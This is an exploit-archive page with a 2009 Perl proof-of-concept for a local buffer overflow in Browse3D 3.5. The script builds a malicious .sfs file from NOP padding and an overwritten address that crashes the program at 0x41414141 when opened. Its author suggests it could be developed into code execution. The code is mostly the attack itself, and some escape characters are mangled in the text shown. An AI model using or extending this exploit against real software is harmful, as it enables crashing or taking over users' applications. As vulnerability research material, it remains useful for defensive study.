[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Browse3D 3.5 (.sfs File) Local Buffer Overflow PoC
# Published : 2009-01-11
# Author : Houssamix
# Previous Title : MS Windows (.CHM File) Denial of Service (html compiled)
# Next Title : MP3 TrackMaker 1.5 (.mp3 File) Local Heap Overflow PoC
#!/usr/bin/perl -w
# -- Viva Gazza -- Viva Palestine --
# Browse3D v3.5 (.sfs) File Local Buffer overflow PoC
# http://www.browse3d.com/downloads/Browse3Dsetup.exe
# Author : Houssamix
# create file exploit > open it >
# Error : Access violation at 0x41414141 ( tried to read from 0x41414141 ), program terminated.
# we can't run this program under the debugger !!! any way i think it's can be exploited . good luck !
print "===================================================================== n";
print "Author : Houssamix n";
print "===================================================================== n";
print "Browse3D v3.5 Local Buffer overflow PoC n";
print "===================================================================== n";
my $adresse = "AAAA" ;
my $nop = "x90" x 261;
my $file = "Houssamix.sfs";
$exploit = $nop.$adresse;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "$file has been created open it with Browse3D v 3.5n";
# www.Syue.com [2009-01-11]